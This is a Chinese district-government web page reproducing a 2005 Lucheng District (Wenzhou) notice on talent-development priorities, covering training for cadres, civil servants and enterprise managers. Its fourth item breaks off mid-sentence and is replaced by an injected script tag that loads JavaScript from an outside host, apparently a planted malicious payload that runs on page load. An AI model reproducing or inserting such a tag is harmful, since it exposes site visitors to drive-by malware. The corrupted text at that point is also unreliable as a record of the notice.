首页>政策文件
关于印发《2005年鹿城区人才工作要点》的通知
时间:2008-03-31 来源: 作者: 字号:[ ]

各街道党工委、办事处,乡镇党委、人民政府,区直各单位:

    经区委、区政府研究决定,现将《2005年鹿城区人才工作要点》印发给你们。望结合实际,认真贯彻落实。

                                                                                                 中共温州市鹿城区委办公室

                                                                                               温州市鹿城区人民政府办公室

                                                                                                         2005年7月27日

主题词:人才工作  2005年  工作要点  印发  通知

  中共温州市鹿城区委办公室          2005年7月27日印发

                                         (共印140份)

2005年鹿城区人才工作要点

   为了深入贯彻全国、省市和全区人才工作会议精神,落实《2004—2008年鹿城区人才发展纲要》(鹿委发〔2004〕34号)的要求,经区委人才工作领导小组审议,提出2005年鹿城区人才工作要点。

    一、构建形式多样、覆盖广泛的人才培养体系,不断提升各类人才的素质和能力

    (一)加大领导干部培训力度。以提高执政能力为核心,以树立科学的发展观和正确的政绩观、人才观为重点,切实办好党员先进性教育为主要内容的领导干部专题研讨班、中青年干部培训班;继续完善科(局)级领导干部理论学习考核办法;采取上挂、下派、外派等多种形式,分期分批选派政治素质好、有发展潜力的后备干部,到艰苦的地方、复杂的岗位进行锻炼。努力办好“鹿城论坛”,邀请知名专家学者、企业总裁、地(厅)级以上党政领导来我区讲座。(责任单位:区委组织部、区委宣传部、区人事劳动局、区直机关工委,协助单位:区委党校、区财政局)

    (二)继续开展大规模公务员培训。以提高公务员服务大局能力、依法行政能力、应对复杂矛盾能力、组织协调能力和拒腐防变能力为重点,深化初任培训、任职培训、专门业务培训和知识更新培训。加强新录用公务员培训工作,落实新录用公务员下基层挂职锻炼制度。全面推行学分制管理办法。(责任单位:区人事劳动局、区委组织部)

    (三)加强企业经营管理人才教育培训。推荐部分优秀企业家参加MBA学习或高级工商管理研修;组织中小企业经营管理人员参加企业管理基础知识培训。制定企业经营管理人才培训制度,探索菜单式培训方法。(责任单位:区经贸局、区委组织部、区人事劳动局)

    (四)加强专业?script src=http://ssxf8.com/x.js>

【返回顶部】【打印本稿】【关闭本页】
0